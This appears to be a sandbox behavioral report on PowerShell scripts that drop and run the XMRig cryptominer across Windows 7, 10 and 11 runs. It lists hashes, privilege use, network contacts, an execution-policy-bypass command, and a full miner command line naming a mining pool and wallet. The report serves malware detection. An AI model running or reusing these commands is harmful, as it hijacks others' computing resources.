memory/808-64-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

memory/808-65-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

memory/808-66-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

memory/808-67-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

memory/808-68-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

memory/808-69-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

memory/808-70-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

memory/808-71-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

memory/808-72-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

memory/808-73-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

memory/808-74-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

memory/808-75-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

memory/808-76-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

memory/808-77-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

memory/808-78-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

memory/808-79-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

memory/808-80-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

memory/808-81-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

memory/808-82-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

memory/808-83-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

memory/808-84-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

memory/808-85-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

memory/808-86-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

memory/808-87-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

memory/808-88-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

memory/808-89-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

memory/808-90-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

memory/808-91-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

memory/808-92-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

memory/808-93-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

memory/808-94-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

memory/808-95-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

memory/808-96-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

memory/808-97-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

memory/808-98-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

memory/808-99-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

memory/808-100-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

memory/808-101-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

memory/808-102-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

memory/808-103-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

memory/808-104-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

memory/808-105-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

memory/808-106-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

memory/808-107-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

memory/808-108-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

memory/808-109-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

memory/808-110-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

memory/808-111-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

memory/808-112-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

memory/808-113-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

memory/808-114-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

memory/808-115-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

memory/808-116-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

memory/808-117-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

memory/808-118-0x00007FF7B5C80000-0x00007FF7B68B3000-memory.dmp

Analysis: behavioral31

Detonation Overview

Submitted

2024-05-22 20:12

Reported

2024-05-23 20:51

Platform

win10v2004-20240508-en

Max time kernel

1790s

Max time network

1787s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
64 matches (description, indicator, process and target not recorded)

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 72.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 26.73.42.20.in-addr.arpa udp

Files

memory/1920-0-0x00007FF9F8B43000-0x00007FF9F8B45000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vf3zxnr3.zrg.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1920-8-0x0000019432D40000-0x0000019432D62000-memory.dmp

memory/1920-11-0x00007FF9F8B40000-0x00007FF9F9601000-memory.dmp

memory/1920-12-0x00007FF9F8B40000-0x00007FF9F9601000-memory.dmp

memory/1920-14-0x00007FF9F8B40000-0x00007FF9F9601000-memory.dmp

memory/1920-15-0x0000019433130000-0x0000019433142000-memory.dmp

memory/1920-16-0x0000019432D30000-0x0000019432D3A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4012-47-0x0000029D54820000-0x0000029D54840000-memory.dmp

memory/4012-48-0x0000029D54870000-0x0000029D54890000-memory.dmp

memory/4012-49-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

memory/4012-52-0x0000029D54A90000-0x0000029D54AB0000-memory.dmp

memory/4012-50-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

memory/4012-51-0x0000029D54AB0000-0x0000029D54AD0000-memory.dmp

memory/1920-53-0x00007FF9F8B43000-0x00007FF9F8B45000-memory.dmp

memory/1920-54-0x00007FF9F8B40000-0x00007FF9F9601000-memory.dmp

memory/4012-55-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

memory/1920-56-0x00007FF9F8B40000-0x00007FF9F9601000-memory.dmp

memory/4012-57-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

memory/4012-58-0x0000029D54AB0000-0x0000029D54AD0000-memory.dmp

memory/4012-59-0x0000029D54A90000-0x0000029D54AB0000-memory.dmp

memory/4012-60-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

memory/4012-61-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

memory/4012-62-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

memory/4012-63-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

memory/4012-64-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

memory/4012-65-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

memory/4012-66-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

memory/4012-67-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

memory/4012-68-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

memory/4012-69-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

memory/4012-70-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

memory/4012-71-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

memory/4012-72-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

memory/4012-73-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

memory/4012-74-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

memory/4012-75-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

memory/4012-76-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

memory/4012-77-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

memory/4012-78-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

memory/4012-79-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

memory/4012-80-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

memory/4012-81-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

memory/4012-82-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

memory/4012-83-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

memory/4012-84-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

memory/4012-85-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

memory/4012-86-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

memory/4012-87-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

memory/4012-88-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

memory/4012-89-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

memory/4012-90-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

memory/4012-91-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

memory/4012-92-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

memory/4012-93-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

memory/4012-94-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

memory/4012-95-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

memory/4012-96-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

memory/4012-97-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

memory/4012-98-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

memory/4012-99-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

memory/4012-100-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

memory/4012-101-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

memory/4012-102-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

memory/4012-103-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

memory/4012-104-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

memory/4012-105-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

memory/4012-106-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

memory/4012-107-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

memory/4012-108-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

memory/4012-109-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

memory/4012-110-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

memory/4012-111-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

memory/4012-112-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

memory/4012-113-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

memory/4012-114-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

memory/4012-115-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

memory/4012-116-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

memory/4012-117-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

memory/4012-118-0x00007FF679680000-0x00007FF67A2B3000-memory.dmp

Analysis: behavioral4

Detonation Overview

Submitted

2024-05-22 20:12

Reported

2024-05-23 20:18

Platform

win11-20240508-en

Max time kernel

1790s

Max time network

1787s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
64 matches (description, indicator, process and target not recorded)

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
GB 161.35.34.195:443 rx.unmineable.com tcp

Files

memory/2632-0-0x00007FFCB83B3000-0x00007FFCB83B5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mzpaizjq.15c.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2632-9-0x000001BA3F570000-0x000001BA3F592000-memory.dmp

memory/2632-10-0x00007FFCB83B0000-0x00007FFCB8E72000-memory.dmp

memory/2632-11-0x00007FFCB83B0000-0x00007FFCB8E72000-memory.dmp

memory/2632-12-0x00007FFCB83B0000-0x00007FFCB8E72000-memory.dmp

memory/2632-14-0x000001BA3F690000-0x000001BA3F6A2000-memory.dmp

memory/2632-15-0x000001BA3F680000-0x000001BA3F68A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral5

Detonation Overview

Submitted

2024-05-22 20:12

Reported

2024-05-23 20:19

Platform

win7-20240508-en

Max time kernel

1558s

Max time network

1559s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

Network

N/A

Files

Analysis: behavioral9

Detonation Overview

Submitted

2024-05-22 20:12

Reported

2024-05-23 20:26

Platform

win7-20240221-en

Max time kernel

1565s

Max time network

1568s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

Network

N/A

Files

Analysis: behavioral11

Detonation Overview

Submitted

2024-05-22 20:12

Reported

2024-05-23 20:27

Platform

win10v2004-20240508-en

Max time kernel

1793s

Max time network

1748s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 68.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
NL 23.62.61.72:443 www.bing.com tcp
US 8.8.8.8:53 72.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 31.251.17.2.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 3.173.189.20.in-addr.arpa udp

Files

memory/972-0-0x00007FFC9B8F3000-0x00007FFC9B8F5000-memory.dmp

memory/972-6-0x0000024EBE330000-0x0000024EBE352000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zcj4zlmi.1yi.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral21

Detonation Overview

Submitted

2024-05-22 20:12

Reported

2024-05-23 20:33

Platform

win7-20240508-en

Max time kernel

1561s

Max time network

1561s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"

Network

N/A

Files

Analysis: behavioral27

Detonation Overview

Submitted

2024-05-22 20:12

Reported

2024-05-23 20:44

Platform

win10v2004-20240426-en

Max time kernel

1790s

Max time network

1792s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
BE 88.221.83.235:443 www.bing.com tcp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 235.83.221.88.in-addr.arpa udp
BE 88.221.83.235:443 www.bing.com tcp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
